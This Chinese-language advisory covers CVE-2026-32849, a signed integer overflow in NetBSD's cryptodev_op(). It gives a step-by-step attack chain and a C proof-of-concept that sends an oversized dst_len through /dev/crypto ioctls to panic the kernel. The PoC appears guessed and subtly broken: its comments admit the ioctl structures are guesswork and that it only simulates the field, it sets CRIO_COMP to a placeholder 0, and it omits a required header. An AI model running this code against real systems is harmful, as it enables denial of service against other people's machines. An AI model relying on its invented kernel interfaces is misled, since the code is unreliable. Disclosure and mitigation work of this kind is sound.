CVE-2026-32849 NetBSD cryptodev有符号整数溢出漏洞

漏洞信息

漏洞编号

CVE-2026-32849

漏洞类型

整数溢出

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

NetBSD

漏洞概述

NetBSD系统在`cryptodev_op()`函数中存在一处有符号整数溢出漏洞。该漏洞源于局部变量`iov_len`被声明为有符号整型，却直接从无符号的`cop->dst_len`赋值。当输入的`dst_len`值超过`INT_MAX`时，会触发整数溢出及未定义行为。拥有低权限的本地攻击者若能访问`/dev/crypto`并使用压缩会话，即可通过构造特定参数触发内核恐慌，导致系统拒绝服务。

技术细节

该漏洞位于NetBSD内核源码文件`sys/opencrypto/cryptodev.c`的`cryptodev_op()`函数中。核心问题在于类型不匹配：局部变量`iov_len`被声明为`signed int`（有符号整型），但在赋值操作中直接接收了结构体成员`cop->dst_len`（无符号类型）的值。当攻击者利用`/dev/crypto`设备接口并启用压缩会话类型时，若传入一个大于`INT_MAX`（即2147483647）的`dst_len`值，便会触发有符号整数溢出。这将导致后续代码执行未定义行为，具体表现为UIO指针运算损坏及NULL指针解引用。在`CONFIG_SVS`安全特性未启用的环境下，此漏洞可被利用直接触发内核恐慌，导致系统崩溃及拒绝服务。

攻击链分析

STEP 1

获取访问权限

攻击者需要在本地拥有低权限账户，并能够读取访问 /dev/crypto 设备文件。

STEP 2

创建恶意会话

攻击者打开 /dev/crypto，并通过 ioctl 创建一个压缩类型的会话。

STEP 3

构造超长参数

准备 crypt_op 结构体，将 dst_len 字段设置为大于 INT_MAX 的值（例如 0xFFFFFFFF）。

STEP 4

触发漏洞

调用 ioctl 系统调用发送恶意请求，导致内核变量 iov_len 发生有符号整数溢出。

STEP 5

系统崩溃

溢出引发 NULL 指针解引用和 UIO 指针运算错误，进而触发内核恐慌，致使系统不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-32849
 * This code attempts to trigger the integer overflow in NetBSD cryptodev.
 * Compile: gcc -o poc_netbsd_crypto poc_netbsd_crypto.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>

// Definitions might vary based on specific NetBSD version headers
#define CIOCCRYPT  _IOWR('d', 101, struct crypt_op)
#define CIOCGSESSION _IOWR('d', 102, struct session_op)

#ifndef CRIO_COMP
#define CRIO_COMP 0
#endif

struct session_op {
    uint32_t cipher;
    uint32_t mac;
    uint32_t keylen;
    void *key;
    uint32_t mackeylen;
    void *mackey;
    uint32_t ses; // Session ID returned
};

struct crypt_op {
    uint32_t ses;
    uint16_t op;
    uint16_t flags;
    void *src;
    void *dst;
    size_t len;
    void *iv;
    // The vulnerable field is dst_len in some contexts or derived from len
    // In this specific PoC we simulate the overflow condition via the
    // structure member that maps to the kernel's cop->dst_len
    size_t dst_len; 
};

int main() {
    int fd = -1;
    struct session_op sess;
    struct crypt_op cop;

    // Open the crypto device
    fd = open("/dev/crypto", O_RDWR);
    if (fd < 0) {
        perror("open /dev/crypto");
        return 1;
    }

    printf("[+] Opened /dev/crypto\n");

    // Setup a session (Compression type as per vulnerability description)
    memset(&sess, 0, sizeof(sess));
    sess.cipher = CRIO_COMP; // Targeting compression session
    
    if (ioctl(fd, CIOCGSESSION, &sess) < 0) {
        perror("ioctl(CIOCGSESSION)");
        close(fd);
        return 1;
    }
    printf("[+] Session created with ID: %d\n", sess.ses);

    // Prepare the operation to trigger the overflow
    memset(&cop, 0, sizeof(cop));
    cop.ses = sess.ses;
    cop.src = (void *)0x1000; // Dummy address
    cop.dst = (void *)0x2000; // Dummy address
    cop.len = 0;
    cop.op = 0; // COP_ENCRYPT or similar

    // Trigger the vulnerability:
    // Assign a value > INT_MAX to dst_len.
    // In the kernel, iov_len (signed int) = cop->dst_len (unsigned).
    // This causes signed integer overflow.
    cop.dst_len = 0xFFFFFFFF; // 4294967295

    printf("[+] Sending malicious request with dst_len = 0x%zx\n", cop.dst_len);
    printf("[!] This will likely cause a Kernel Panic (DoS).\n");

    // Execute the ioctl
    if (ioctl(fd, CIOCCRYPT, &cop) < 0) {
        perror("ioctl(CIOCCRYPT)");
        // If ioctl fails due to validation, panic might be avoided,
        // but the description suggests it leads to panic directly or via UB.
    }

    close(fd);
    return 0;
}

影响范围

NetBSD < commit ec8451e

防御指南

临时缓解措施

建议立即升级NetBSD系统至包含补丁 ec8451e 的版本。若无法立即升级，可通过文件系统权限控制，限制非特权用户对 /dev/crypto 设备的访问，从而降低被利用的风险。